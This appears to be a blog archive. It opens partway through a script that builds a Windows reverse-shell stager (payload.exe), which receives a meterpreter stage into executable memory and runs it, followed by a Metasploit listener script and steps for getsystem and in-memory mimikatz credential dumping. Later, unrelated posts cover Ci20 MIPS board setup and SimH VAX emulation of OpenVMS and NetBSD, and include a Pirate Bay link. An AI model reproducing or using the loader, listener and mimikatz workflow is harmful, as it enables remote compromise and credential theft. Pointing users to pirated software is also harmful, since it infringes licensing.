echo ' }' >> temp.c 
echo ' int recv_all(SOCKET my_socket, void * buffer, int len) {' >> temp.c 
echo ' int tret = 0;'>> temp.c 
echo ' int nret = 0;'>>temp.c 
echo ' char * startb = buffer;'>> temp.c 
echo ' while (tret < len) {'>>temp.c 
echo ' nret = recv(my_socket, startb, len - tret, 0);'>> temp.c 
# recv() == 0 means the handler closed the connection; without this check the loop spins forever
echo ' if (nret == SOCKET_ERROR || nret == 0)'>> temp.c 
echo ' punt(my_socket, "no data");'>> temp.c 
echo ' startb += nret;'>> temp.c 
echo ' tret += nret;'>>temp.c 
echo ' }'>>temp.c 
echo ' return tret;'>> temp.c 
echo '}' >> temp.c 
echo 'SOCKET wsconnect(char * targetip, int port) {'>> temp.c 
echo ' struct hostent * target;' >> temp.c 
echo ' struct sockaddr_in sock;' >> temp.c
echo ' SOCKET my_socket;'>>temp.c 
echo ' my_socket = socket(AF_INET, SOCK_STREAM, 0);'>> temp.c 
echo ' if (my_socket == INVALID_SOCKET)'>> temp.c 
echo ' punt(my_socket, ".");'>>temp.c 
echo ' target = gethostbyname(targetip);'>>temp.c 
echo ' if (target == NULL)'>>temp.c 
echo ' punt(my_socket, "..");'>>temp.c 
echo ' memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);'>>temp.c 
echo ' sock.sin_family = AF_INET;'>> temp.c 
echo ' sock.sin_port = htons(port);'>>temp.c 
echo ' if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )'>>temp.c 
echo ' punt(my_socket, "...");'>>temp.c 
echo ' return my_socket;'>>temp.c 
echo '}' >> temp.c 
echo 'int main(int argc, char * argv[]) {' >> temp.c 
echo ' FreeConsole();'>>temp.c 
echo ' Sleep(10);'>>temp.c 
echo ' ULONG32 size;'>>temp.c 
echo ' char * buffer;'>>temp.c 
echo ' void (*function)();'>>temp.c 
echo ' winsock_init();'>> temp.c 
echo ' SOCKET my_socket = wsconnect(server, atoi(serverp));'>>temp.c 
echo ' int count = recv(my_socket, (char *)&size, 4, 0);'>>temp.c 
echo ' if (count != 4 || size <= 0)'>>temp.c 
echo ' punt(my_socket, "error length\n");'>>temp.c 
echo ' buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);'>>temp.c 
echo ' if (buffer == NULL)'>>temp.c 
echo ' punt(my_socket, "error in buf\n");'>>temp.c 
echo ' buffer[0] = 0xBF;'>>temp.c 
echo ' memcpy(buffer + 1, &my_socket, 4);'>>temp.c 
echo ' count = recv_all(my_socket, buffer + 5, size);'>>temp.c 
echo ' function = (void (*)())buffer;'>>temp.c 
echo ' function();'>>temp.c 
echo ' return 0;'>>temp.c 
echo '}' >> temp.c 
echo '(+) Compiling binary ..' 
x86_64-w64-mingw32-gcc temp.c -o payload.exe -lws2_32 -mwindows 
ls -la temp.c
# use the cross toolchain's strip so it matches the PE32+ target format
x86_64-w64-mingw32-strip payload.exe 
file=`ls -la payload.exe` ; echo '(+)' $file

This will generate a loader called payload.exe which you can execute on the Windows 10 lab machine (I ran it as administrator so that the latest 64-bit mimikatz.exe could later be loaded into memory from the spawned reverse shell).
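As an added example (this is not the post's code, nor rsmudge's metasploit-loader that the generator is based on), here is the stager exchange that the handler and payload.exe perform, written against POSIX sockets so it runs on Linux without Metasploit, with a constructed 64-byte stand-in for the meterpreter stage: the handler sends a 4-byte little-endian length followed by the stage, and the loader allocates length+5 bytes, writes the mov edi, <socket> prefix (BF imm32) that hands the socket handle to the stage, and reassembles the stage from partial reads before it would ever jump to the buffer. The 7-byte send chunking, the 16 MiB length bound and the function names are assumptions of this example. The second function exercises the failure mode the post's recv_all loop does not handle: the handler closing the connection before the full stage has arrived, which leaves that loop spinning on recv() returning 0.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#define MAX_STAGE (16u * 1024u * 1024u)  /* assumed sanity bound on the stage length */

/* Read exactly len bytes; -1 on error or if the peer closes first. The post's
 * recv_all never checks for recv() == 0, so a stage cut short spins forever. */
static ssize_t recv_all(int fd, void *buf, size_t len)
{
    unsigned char *p = buf;
    size_t got = 0;
    while (got < len) {
        ssize_t n = recv(fd, p + got, len - got, 0);
        if (n <= 0) return -1;
        got += (size_t)n;
    }
    return (ssize_t)got;
}

/* Handler side: 4-byte little-endian length, then the stage, sent here in
 * 7-byte pieces (a demo assumption) so the loader must reassemble it. */
static int send_stage(int fd, const unsigned char *stage, uint32_t len)
{
    unsigned char hdr[4];
    for (int i = 0; i < 4; i++) hdr[i] = (len >> (8 * i)) & 0xff;
    if (send(fd, hdr, 4, 0) != 4) return -1;
    for (uint32_t off = 0; off < len;) {
        uint32_t chunk = len - off < 7 ? len - off : 7;
        ssize_t n = send(fd, stage + off, chunk, 0);
        if (n <= 0) return -1;
        off += (uint32_t)n;
    }
    return 0;
}

/* Loader side: read the length, put "mov edi, <socket>" (BF imm32) in front of
 * the stage. The x64 stage reads the socket from rdi, and a 32-bit write to edi
 * zero-extends into rdi, so the same 5-byte prefix serves both architectures.
 * Returns a malloc'd buffer of *out_len bytes, or NULL on any protocol error. */
static unsigned char *receive_stage(int fd, uint32_t sock, size_t *out_len)
{
    unsigned char hdr[4];
    if (recv_all(fd, hdr, 4) != 4) return NULL;
    uint32_t len = 0;
    for (int i = 0; i < 4; i++) len |= (uint32_t)hdr[i] << (8 * i);
    if (len == 0 || len > MAX_STAGE) return NULL;
    unsigned char *buf = malloc(len + 5);
    if (buf == NULL) return NULL;
    buf[0] = 0xBF;
    for (int i = 0; i < 4; i++) buf[1 + i] = (sock >> (8 * i)) & 0xff;
    if (recv_all(fd, buf + 5, len) != (ssize_t)len) { free(buf); return NULL; }
    *out_len = len + 5;
    return buf;
}

/* Both sides over a socketpair with a constructed 64-byte stand-in stage (not
 * shellcode). Returns 1 if the loader ends up with BF <socket> followed by it. */
int demo_handshake(void)
{
    unsigned char stage[64];
    for (size_t i = 0; i < sizeof stage; i++) stage[i] = (unsigned char)(0x90 + i);
    int sv[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) != 0) return 0;
    int ok = send_stage(sv[0], stage, sizeof stage) == 0;
    close(sv[0]);
    size_t total = 0;
    unsigned char *buf = receive_stage(sv[1], 0x1234u, &total);
    close(sv[1]);
    ok = ok && buf != NULL && total == sizeof stage + 5 &&
         buf[0] == 0xBF && buf[1] == 0x34 && buf[2] == 0x12 && buf[3] == 0 &&
         buf[4] == 0 && memcmp(buf + 5, stage, sizeof stage) == 0;
    free(buf);
    return ok;
}

/* Handler announces 100 bytes but closes after 3: the loader must give up rather
 * than hang or run a partial buffer. Returns 1 if it gives up. */
int demo_truncated(void)
{
    int sv[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) != 0) return 0;
    unsigned char hdr[4] = { 100, 0, 0, 0 };
    (void)send(sv[0], hdr, 4, 0);
    (void)send(sv[0], "abc", 3, 0);
    close(sv[0]);
    size_t total = 0;
    unsigned char *buf = receive_stage(sv[1], 1, &total);
    close(sv[1]);
    free(buf);
    return buf == NULL;
}

int main(void) { return demo_handshake() && demo_truncated() ? 0 : 1; }
```

Build it with any C99 compiler (cc stager_demo.c, the file name being hypothetical) and run it; exit status 0 means both the complete handshake and the truncated-stage case behaved. The only thing the Windows loader adds is the destination: the same prefix-plus-stage bytes land in a PAGE_EXECUTE_READWRITE allocation and are called, which is the unbacked RWX allocation pattern that gets such loaders noticed.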

My listener on the attacking machine running Metasploit is as follows:

#!/bin/bash
clear
echo "***************************************************************"
echo "    X86-64 meterpreter reverse tcp listener loader             "
echo "***************************************************************"
echo -e "What IP are we gonna listen to ? \c"
read host
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo "Starting the meterpreter listener.."
echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp ; set LHOST ' > run.listener.sh 
echo -n $host >> run.listener.sh 
echo -n '; set LPORT ' >> run.listener.sh 
echo -n $port >> run.listener.sh 
echo -n '; run"' >> run.listener.sh 
chmod +x run.listener.sh 
./run.listener.sh

So run the above script from your Metasploit directory and execute payload.exe on the test machine.

Once the reverse shell connects, run getsystem to elevate to NT AUTHORITY\SYSTEM and execute the latest 64-bit mimikatz.exe:

Mimikatz 2.1.1-20180127   https://github.com/gentilkiwi/mimikatz/releases/tag/2.1.1-20180127

Download, extract and copy x64/mimikatz.exe to your Metasploit root directory, then run it in the target's memory via the following meterpreter command (-m executes the local file from memory without writing it to the target's disk, -d names the dummy process it runs as):

meterpreter > execute -H -i -c -f /home/user/metasploit-framework/mimikatz.exe -m -d calc.exe

You get the latest mimikatz running with all the newly added features, DCShadow among them.

Of course we can also have some fun with the DPAPI stuff in Windows (as described here https://github.com/gentilkiwi/mimikatz/wiki/howto-~-scheduled-tasks-credentials)

Creator Ci20 mipsel update


A short update here.

I would like to thank mips.com for bringing the Ci20 NAND images back online. They were missing for some time. NAND images are back!

http://mipscreator.mips.com/CI20/images/default_NAND/Debian8_20160602/nand_2016_06_02.img

If somebody finds GCC 7.3.0 binaries for Ci20 mipsel Debian 8.4 (Linux ci20 3.18.3-ci20-1 #1 SMP PREEMPT Wed May 25 10:24:41 UTC 2016 mips GNU/Linux)
useful I’m sharing them here

https://45.76.81.249:8000/mipsel-gcc/

Here is a screenshot from the environment

P.S Gentoo Ci20 NAND image is flawed http://distfiles.gentoo.org/experimental/mips/desktop-ci20/
There seems to be some bug in the native GCC compiler which crashes randomly.

Remember, when building new binaries via this compiler, to set the appropriate library path:

LIBRARY_PATH=/usr/lib/mipsel-linux-gnu
export LIBRARY_PATH

As well as proper symlinks  in /usr/bin

  gcc -> /usr/local/gcc-7.3.0/bin/gcc
  g++ -> /usr/local/gcc-7.3.0/bin/g++
  cpp -> /usr/local/gcc-7.3.0/bin/cpp

I have updated and will keep posting new pkgsrc-current (as of 20.02.2018) packages for Debian8 Ci20 here

https://45.76.81.249:8000/pkgsrc/debian8-ci20/All/

Running OpenVMS 7.3 on mipsel Ci20 creator board


I have flashed the Ci20 board with the latest Debian 8 NAND from Imagination, as described here https://elinux.org/CI20_Distros

The process is not hard; all that is needed is to follow the instructions properly (the board is almost impossible to brick).

Once you have the Ci20 up with Debian 8 you can use the binary pkgsrc packages I have made for the board, available here: https://45.76.81.249:8000/pkgsrc/debian8-ci20/

You will need a decent version of SimH (Debian 8 ships with simh 3.8.1-5); I have used the version that comes with pkgsrc-current, simh-4.0.0.20170406, from https://github.com/simh/simh

Unfortunately simh-4.0.0.20170406 does not build properly via pkgsrc on the Ci20, so I had to build it manually and shuffle a few includes around on the filesystem (binaries for the Ci20 mipsel are uploaded here: https://45.76.81.249:8000/pkgsrc/debian8-ci20/simh/).

Here is a list of the Debian packages I had to install to get the SimH to compile

2018-03-01 22:11:15 install libgles2-mesa:mipsel <none> 10.3.2-1+deb8u1
2018-03-01 22:11:15 install libpcrecpp0:mipsel <none> 2:8.35-3.3+deb8u4
2018-03-01 22:11:17 install libsdl2-2.0-0:mipsel <none> 2.0.2+dfsg1-6
2018-03-01 22:11:18 install libxcb-randr0:mipsel <none> 1.10-3+b1
2018-03-01 22:11:19 install libasound2-dev:mipsel <none> 1.0.28-1
2018-03-01 22:11:19 install libavahi-common-dev:mipsel <none> 0.6.31-5
2018-03-01 22:11:19 install pkg-config:mipsel <none> 0.28-1
2018-03-01 22:11:20 install libdbus-1-dev:mipsel <none> 1.8.22-0+deb8u1
2018-03-01 22:11:20 install libavahi-client-dev:mipsel <none> 0.6.31-5
2018-03-01 22:11:21 install libdrm-dev:mipsel <none> 2.4.58-2
2018-03-01 22:11:21 install x11proto-dri2-dev:all <none> 2.8-2
2018-03-01 22:11:22 install x11proto-gl-dev:all <none> 1.4.17-1
2018-03-01 22:11:22 install x11proto-xext-dev:all <none> 7.3.0-1
2018-03-01 22:11:22 install libxext-dev:mipsel <none> 2:1.3.3-1
2018-03-01 22:11:23 install x11proto-xf86vidmode-dev:all <none> 2.3.1-2
2018-03-01 22:11:23 install libxxf86vm-dev:mipsel <none> 1:1.1.3-1+b1
2018-03-01 22:11:24 install x11proto-fixes-dev:all <none> 1:5.0-2
2018-03-01 22:11:24 install libxfixes-dev:mipsel <none> 1:5.0.1-2+deb8u1
2018-03-01 22:11:24 install x11proto-damage-dev:all <none> 1:1.2.1-2
2018-03-01 22:11:25 install libxdamage-dev:mipsel <none> 1:1.1.4-2+b1
2018-03-01 22:11:25 install libxcb-glx0-dev:mipsel <none> 1.10-3+b1
2018-03-01 22:11:25 install libxcb-dri2-0-dev:mipsel <none> 1.10-3+b1
2018-03-01 22:11:26 install libxcb-dri3-dev:mipsel <none> 1.10-3+b1
2018-03-01 22:11:26 install libxcb-render0-dev:mipsel <none> 1.10-3+b1
2018-03-01 22:11:26 install libxcb-randr0-dev:mipsel <none> 1.10-3+b1
2018-03-01 22:11:26 install libxcb-shape0-dev:mipsel <none> 1.10-3+b1
2018-03-01 22:11:27 install libxcb-xfixes0-dev:mipsel <none> 1.10-3+b1
2018-03-01 22:11:27 install libxcb-sync-dev:mipsel <none> 1.10-3+b1
2018-03-01 22:11:27 install libxcb-present-dev:mipsel <none> 1.10-3+b1
2018-03-01 22:11:28 install libxshmfence-dev:mipsel <none> 1.1-4
2018-03-01 22:11:28 install libx11-xcb-dev:mipsel <none> 2:1.6.2-3+deb8u1
2018-03-01 22:11:28 install libwayland-dev:mipsel <none> 1.6.0-2
2018-03-01 22:11:29 install libegl1-mesa-dev:mipsel <none> 10.3.2-1+deb8u1
2018-03-01 22:11:29 install mesa-common-dev:mipsel <none> 10.3.2-1+deb8u1
2018-03-01 22:11:30 install libgl1-mesa-dev:mipsel <none> 10.3.2-1+deb8u1
2018-03-01 22:11:30 install libgles2-mesa-dev:mipsel <none> 10.3.2-1+deb8u1
2018-03-01 22:11:31 install libpcre3-dev:mipsel <none> 2:8.35-3.3+deb8u4
2018-03-01 22:11:32 install libglib2.0-dev:mipsel <none> 2.42.1-1+b1
2018-03-01 22:11:36 install libglu1-mesa-dev:mipsel <none> 9.0.0-2
2018-03-01 22:11:37 install libice-dev:mipsel <none> 2:1.0.9-1+b1
2018-03-01 22:11:37 install libpulse-dev:mipsel <none> 5.0-13
2018-03-01 22:11:37 install libudev-dev:mipsel <none> 215-17+deb8u7
2018-03-01 22:11:38 install x11proto-render-dev:all <none> 2:0.11.1-2
2018-03-01 22:11:38 install libxrender-dev:mipsel <none> 1:0.9.8-1+b1
2018-03-01 22:11:38 install libxcursor-dev:mipsel <none> 1:1.1.14-1+deb8u1
2018-03-01 22:11:39 install libxi-dev:mipsel <none> 2:1.7.4-1+deb8u1
2018-03-01 22:11:40 install x11proto-xinerama-dev:all <none> 1.2.1-2
2018-03-01 22:11:40 install libxinerama-dev:mipsel <none> 2:1.1.3-1+b1
2018-03-01 22:11:40 install libxkbcommon-dev:mipsel <none> 0.4.3-2
2018-03-01 22:11:41 install x11proto-randr-dev:all <none> 1.4.0-2
2018-03-01 22:11:41 install libxrandr-dev:mipsel <none> 2:1.4.2-1+deb8u1
2018-03-01 22:11:41 install x11proto-scrnsaver-dev:all <none> 1.2.2-1
2018-03-01 22:11:42 install libxss-dev:mipsel <none> 1:1.2.2-1
2018-03-01 22:11:42 install libsm-dev:mipsel <none> 2:1.2.2-1+b1
2018-03-01 22:11:42 install libxt-dev:mipsel <none> 1:1.1.4-1+b1
2018-03-01 22:11:44 install x11proto-video-dev:all <none> 2.3.2-1
2018-03-01 22:11:44 install libxv-dev:mipsel <none> 2:1.0.10-1+deb8u1
2018-03-01 22:11:44 install libsdl2-dev:mipsel <none> 2.0.2+dfsg1-6

Just to give you an example, here is the ldd output for the vax binary showing where its libraries are picked up from:

 libSDL2-2.0.so.0 => /usr/lib/libSDL2-2.0.so.0 (0x77dc7000)
 libm.so.6 => /lib/mipsel-linux-gnu/libm.so.6 (0x77d19000)
 librt.so.1 => /lib/mipsel-linux-gnu/librt.so.1 (0x77d01000)
 libpthread.so.0 => /lib/mipsel-linux-gnu/libpthread.so.0 (0x77cd6000)
 libpcreposix.so.3 => /usr/lib/libpcreposix.so.3 (0x77cc2000)
 libdl.so.2 => /lib/mipsel-linux-gnu/libdl.so.2 (0x77caf000)
 libvdeplug.so.2 => /usr/lib/libvdeplug.so.2 (0x77c99000)
 libc.so.6 => /lib/mipsel-linux-gnu/libc.so.6 (0x77b16000)
 libasound.so.2 => /usr/lib/libasound.so.2 (0x77a1e000)
 libpulse-simple.so.0 => /usr/lib/libpulse-simple.so.0 (0x77a0a000)
 libpulse.so.0 => /usr/lib/libpulse.so.0 (0x779ad000)
 libX11.so.6 => /usr/lib/libX11.so.6 (0x77866000)
 libXext.so.6 => /usr/lib/libXext.so.6 (0x77843000)
 libXcursor.so.1 => /usr/lib/libXcursor.so.1 (0x77829000)
 libXinerama.so.1 => /usr/lib/libXinerama.so.1 (0x77816000)
 libXi.so.6 => /usr/lib/libXi.so.6 (0x777f4000)
 libXrandr.so.2 => /usr/lib/libXrandr.so.2 (0x777d9000)
 libXss.so.1 => /usr/lib/libXss.so.1 (0x777c7000)
 libXxf86vm.so.1 => /usr/lib/libXxf86vm.so.1 (0x777b1000)
 libwayland-egl.so.1 => /usr/lib/libwayland-egl.so.1 (0x7779f000)
 libwayland-client.so.0 => /usr/lib/libwayland-client.so.0 (0x77783000)
 libwayland-cursor.so.0 => /usr/lib/libwayland-cursor.so.0 (0x7776b000)
 libxkbcommon.so.0 => /usr/lib/libxkbcommon.so.0 (0x7771f000)
 /lib/ld.so.1 (0x77ee6000)
 libpcre.so.3 => /lib/mipsel-linux-gnu/libpcre.so.3 (0x7769e000)
 libpulsecommon-5.0.so => /usr/lib/mipsel-linux-gnu/pulseaudio/libpulsecommon-5.0.so (0x77619000)
 libcap.so.2 => /lib/mipsel-linux-gnu/libcap.so.2 (0x77604000)
 libjson-c.so.2 => /lib/mipsel-linux-gnu/libjson-c.so.2 (0x775ea000)
 libdbus-1.so.3 => /lib/mipsel-linux-gnu/libdbus-1.so.3 (0x77590000)
 libxcb.so.1 => /usr/lib/libxcb.so.1 (0x77562000)
 libXrender.so.1 => /usr/lib/libXrender.so.1 (0x77547000)
 libXfixes.so.3 => /usr/lib/libXfixes.so.3 (0x77531000)
 libffi.so.6 => /usr/lib/libffi.so.6 (0x77518000)
 libX11-xcb.so.1 => /usr/lib/libX11-xcb.so.1 (0x77506000)
 libICE.so.6 => /usr/lib/libICE.so.6 (0x774dc000)
 libSM.so.6 => /usr/lib/libSM.so.6 (0x774c3000)
 libXtst.so.6 => /usr/lib/libXtst.so.6 (0x774ac000)
 libsystemd.so.0 => /lib/mipsel-linux-gnu/libsystemd.so.0 (0x77477000)
 libwrap.so.0 => /lib/mipsel-linux-gnu/libwrap.so.0 (0x7745e000)
 libsndfile.so.1 => /usr/lib/libsndfile.so.1 (0x773d7000)
 libasyncns.so.0 => /usr/lib/libasyncns.so.0 (0x773c1000)
 libattr.so.1 => /lib/mipsel-linux-gnu/libattr.so.1 (0x773ac000)
 libXau.so.6 => /usr/lib/libXau.so.6 (0x77399000)
 libXdmcp.so.6 => /usr/lib/libXdmcp.so.6 (0x77384000)
 libuuid.so.1 => /lib/mipsel-linux-gnu/libuuid.so.1 (0x7736d000)
 liblzma.so.5 => /lib/mipsel-linux-gnu/liblzma.so.5 (0x77339000)
 libgcrypt.so.20 => /lib/mipsel-linux-gnu/libgcrypt.so.20 (0x77276000)
 libresolv.so.2 => /lib/mipsel-linux-gnu/libresolv.so.2 (0x77250000)
 libnsl.so.1 => /lib/mipsel-linux-gnu/libnsl.so.1 (0x77227000)
 libFLAC.so.8 => /usr/lib/libFLAC.so.8 (0x771e2000)
 libvorbisenc.so.2 => /usr/lib/libvorbisenc.so.2 (0x7714f000)
 libgpg-error.so.0 => /lib/mipsel-linux-gnu/libgpg-error.so.0 (0x7712d000)
 libogg.so.0 => /usr/lib/libogg.so.0 (0x77115000)
 libvorbis.so.0 => /usr/lib/libvorbis.so.0 (0x770d9000)

Getting OpenVMS 7.3 images

Now there are of course official ways, and these should be followed, so please refer to this instruction https://astr0baby.wordpress.com/2017/10/22/setting-up-dw-motif-on-openvms-8-4-2-alphavm-linux64/ on how to register for DECUServe, since we will need the hobbyist licenses for OpenVMS anyway.

Or you can just grab a copy from the PirateBay (search for OpenVMS)  https://www.thepiratebay.org/torrent/4810604/OpenVMS_VAX_7.3

Setting up the environment

Now let's prepare the VMS environment on the Ci20 board. The screenshot below shows my layout; we will go through it step by step.

So obviously we need to upload the OpenVMS 7.3 CD ISO file to the board,  and place it in the simulator directory which I have called OpenVMS

Next we need to create the dua0 disk image disk.dd; I have used a size of 512 MB via the following command:

dd if=/dev/zero of=disk.dd bs=1024 count=512K

We will also need the vax.ini configuration file populated; here is my example:

;
; Load CPU microcode
load -r /home/ci20/OpenVMS/ka655x.bin
;
; This virtual machine has 128M memory
set cpu 128m
;
; Define disk drive types. RA92 is largest-supported VAX drive.
set rq0 ra92
set rq3 cdrom
;
; Attach defined drives to local files
attach rq0 /home/ci20/OpenVMS/disk.dd
;
; Attach the CD-ROM to its file (read-only)
attach -r rq3 /home/ci20/OpenVMS/cd.iso
;
; Disable unused devices. It's also possible to disable individual devices,
; using a construction like "set rq2 disable" if desired.
;
set rl disable
set ts disable
;
; Attach Ethernet to a network interface
set xq mac=08-00-2B-AA-BB-CC
attach xq tap:tap0
;
; Now start the emulator
boot cpu

From the above configuration we are looking at these custom locations and files

/home/ci20/OpenVMS/ka655x.bin   <--- that's the VAX ROM file; you can
download it from https://github.com/simh/simh/blob/master/VAX/ka655x.bin
attach rq0 /home/ci20/OpenVMS/disk.dd  <--- this is our dua0 disk
attach -r rq3 /home/ci20/OpenVMS/cd.iso <--- this is the VMS cdrom

Next we need to configure the networking part to be able to use TCPIP on the simulated OpenVMS.

Please install these tools for the bridging

# apt-get install libpcap-dev  bridge-utils uml-utilities

And here is my networking script (networking.sh) that sets up everything needed; execute it as root before loading the simulator:

#Setup tap and bridge 
tunctl -t tap0 -u ci20 
ifconfig tap0 up
brctl addbr br0
brctl addif br0 eth0 
brctl setfd br0 0
ifconfig eth0 10.0.2.1 up 
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
brctl addif br0 tap0
ifconfig tap0 0.0.0.0 
sysctl net.ipv4.ip_forward=1
iptables -A FORWARD --in-interface eth0 -j ACCEPT
iptables --table nat -A POSTROUTING --out-interface wlan0 -j MASQUERADE

Next we place the actual simulator binary vax into our working directory and create a simple loader called run.sh that starts the simulator with the configuration file created above; it contains this:

./vax vax.ini

We are now ready for the first boot.

Booting up OpenVMS 7.3 and installing it

Follow these steps to boot up the simulator; please note that we will be running as root here most of the time, which is not for the faint hearted :)

#./networking.sh 
#./run.sh

Once the simulator has booted to the KA655X console prompt (>>>), list all devices with sho dev, as seen below:

KA655X-B V5.3, VMB 2.7
Performing normal system tests.
40..39..38..37..36..35..34..33..32..31..30..29..28..27..26..25..
24..23..22..21..20..19..18..17..16..15..14..13..12..11..10..09..
08..07..06..05..04..03..
Tests completed.
>>>sho dev
UQSSP Disk Controller 0 (772150)
-DUA0 (RA92)
-DUA1 (RD54)
-DUA2 (RD54)
-DUA3 (RRD40)

UQSSP Tape Controller 0 (774500)
-MUA0 (TK50)
-MUA1 (TK50)
-MUA2 (TK50)
-MUA3 (TK50)

Ethernet Adapter 0 (774440)
-XQA0 (08-00-2B-AA-BB-CC)
>>>

We will see all the devices we are going to use; for now what matters is the CDROM device DUA3 and the disk.dd disk DUA0.

To boot the CDROM image simply issue boot dua3 command

>>> boot dua3

Next we will be using the instructions from Phillip Wherry located here https://www.wherry.com/gadgets/retrocomputing/vax-simh.html, which are very well written and contain a very detailed OpenVMS installation procedure.

Please read from the section “Install the OpenVMS Operating System”.

I will only include the differences from Phillip's document here.

We only have one disk, dua0, so change the commands accordingly.

When asked for DECwindows install them 
* Do you want the DECwindows base support? (Y/N) Y

Before installing TCPIP make sure you set INTSTKPAGES to a value of at
least 40 (needed for DW-MOTIF as well):

$ set proc/priv=all 
$ r sys$system:sysgen 
SYSGEN> SET INTSTKPAGES 40 
SYSGEN> WRITE CURRENT 
SYSGEN> EXIT
$ @sys$system:shutdown 

During TCPIP setup, don't configure the domain:
* Configuration options:

1 - Domain           <--- NO 
2 - Interfaces       <--- YES 
3 - Routing          <--- YES 
4 - BIND Resolver    <--- YES 
5 - Time Zone        <--- NO 

Please use the following TCPIP configuration values to get networking
running on your CI20 OpenVMS

Interfaces

Routing

Resolver

Choose Google DNS for example, 8.8.8.8, and name it googleresolver

Getting the DW-MOTIF up

to mount a cdrom image 
$ set proc/priv=all
$ mount/over=id dua3:


to browse it 
$ set def DUA3:[000000]

To install DW-MOTIF stuff
$ set def [DWMOTIF_VAX126.kit]
$ product install *

Once the above sets are installed you can enable the remote X desktop via the following sequence (192.168.11.3 is the IP of my other laptop that runs Linux and Xming under wine). Bear in mind that DECwindows over the TCP transport is an unencrypted X11 session that relies purely on the X server's host-based access control, so keep it on the isolated lab segment.

CI20
CI20
192.168.11.10

On OpenVMS Ci20

set display/create/node=192.168.11.3/transport=tcpip/server=3 
run sys$system:decw$startlogin.exe

And on the Linux machine with the installed Xming execute the following

$ cd .wine/drive_c/Program\ Files\ \(x86\)/Xming/
$ wine Xming.exe :3

You will get the following screen

Troubleshooting

Sometimes the simulator bails out with the error below; to fix it simply restart simh

>>>boot dua0
(BOOT/R5:0 DUA0

2..
?4C DEVINACT, DUA0
HALT instruction, PC: 00000C1A (MOVL (R11),SP)
sim> exit
Goodbye
Eth: closed tap0

Video Demonstration


Running Vax NetBSD on mipsel Ci20 creator board (via simh)


The title might be  a little misleading since we are not running NetBSD directly off the Ci20 board, but via SimH-current using the vax simulator.

There is an official guide from the NetBSD project on how to do this here http://www.netbsd.org/ports/vax/emulator-howto.html

I will just re-trace the steps and comment on the differences I have done to get the system up and running.

Prerequisites:

SimH-current from https://github.com/simh/simh

In order to build the simulator you need to apt-get a few things first

root@ci20:~# apt-get install libgles2-mesa libpcrecpp0 libsdl2-2.0-0 
libxcb-randr0 libasound2-dev libavahi-common-dev pkg-config 
libdbus-1-dev libavahi-client-dev libdrm-dev x11proto-dri2-dev 
x11proto-gl-dev x11proto-xext-dev libxext-dev x11proto-xf86vidmode-dev 
libxxf86vm-dev x11proto-fixes-dev libxfixes-dev x11proto-damage-dev 
libxdamage-dev libxcb-glx0-dev libxcb-dri2-0-dev libxcb-dri3-dev 
libxcb-render0-dev libxcb-randr0-dev libxcb-shape0-dev libxcb-xfixes0-dev 
libxcb-sync-dev libxcb-present-dev libxshmfence-dev libx11-xcb-dev 
libwayland-dev libegl1-mesa-dev mesa-common-dev libgl1-mesa-dev 
libgles2-mesa-dev libpcre3-dev libglib2.0-dev libglu1-mesa-dev libice-dev 
libpulse-dev libudev-dev x11proto-render-dev libxrender-dev libxcursor-dev 
libxi-dev x11proto-xinerama-dev libxinerama-dev libxkbcommon-dev 
x11proto-randr-dev libxrandr-dev x11proto-scrnsaver-dev libxss-dev 
libsm-dev libxt-dev x11proto-video-dev libxv-dev libsdl2-dev libpcap-dev
bridge-utils uml-utilities

then we can build the simulator (I'm using git from pkgsrc-current, https://45.76.81.249:8000/pkgsrc/debian8-ci20/ )

root@ci20:~# git clone https://github.com/simh/simh.git
root@ci20:~# cd simh 
root@ci20:~/simh# make vax 
root@ci20:~/simh# ls -la /root/simh/BIN      <--- compiled vax binary here

Next we should copy the compiled vax binary to our working directory where we will keep our simulator files

Preparing for Installation:

We start first by creating the working directory and getting the latest NetBSD VAX installation image

root@ci20:~# mkdir -p /home/ci20/NetBSD
root@ci20:~# cd /home/ci20/NetBSD
root@ci20:/home/ci20/NetBSD# wget http://ftp.netbsd.org/pub/NetBSD/iso/7.1.1/NetBSD-7.1.1-vax.iso
root@ci20:/home/ci20/NetBSD# cp /root/simh/BIN/vax .

Next we need to create the dua0 disk image disk.dd; I used a 512 MB size via the following command

dd if=/dev/zero of=disk.dd bs=1024 count=512K

Next we prepare the netbsd.ini configuration file for the vax simulator

;
; Load CPU microcode
load -r /home/ci20/NetBSD/ka655x.bin
;
;
; This virtual machine has 128M memory (NetBSD reports 127 MB total at boot)
set cpu 128m
;
; Define disk drive types. RA92 is largest-supported VAX drive.
set rq0 ra92
set rq3 cdrom
;
; Attach defined drives to local files
attach rq0 /home/ci20/NetBSD/disk.dd
;
; Attach the CD-ROM to its file (read-only)
attach -r rq3 /home/ci20/NetBSD/NetBSD-7.1.1-vax.iso
;
; Disable unused devices. It's also possible to disable individual devices,
; using a construction like "set rq2 disable" if desired.
;
set rl disable
set ts disable
;
; Attach Ethernet to a network interface
set xq mac=08-00-2B-AA-BB-CC
attach xq tap:tap0
;
; Now start the emulator
boot cpu

Next we prepare our network script to get the networking going (this is not specific to the Ci20 device and can be used in other scenarios). It assumes your internet connection is through the wireless interface wlan0; call this file networking.sh (if the 10.0.2.0/24 range below collides with your network, change it to another subnet)

#!/bin/sh
# Setup tap and bridge: the simulated VAX sits on tap0, which is bridged with
# eth0 on br0; the host end of the bridge (10.0.2.2) is the VAX's default
# gateway and its traffic is NATed out through wlan0
tunctl -t tap0 -u ci20 
ifconfig tap0 up
brctl addbr br0
brctl addif br0 eth0 
brctl setfd br0 0
ifconfig eth0 10.0.2.1 up 
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
brctl addif br0 tap0
ifconfig tap0 0.0.0.0 
sysctl net.ipv4.ip_forward=1
iptables -A FORWARD --in-interface eth0 -j ACCEPT
iptables --table nat -A POSTROUTING --out-interface wlan0 -j MASQUERADE

Copy over from the simh working directory the VAX/ka655x.bin ROM file

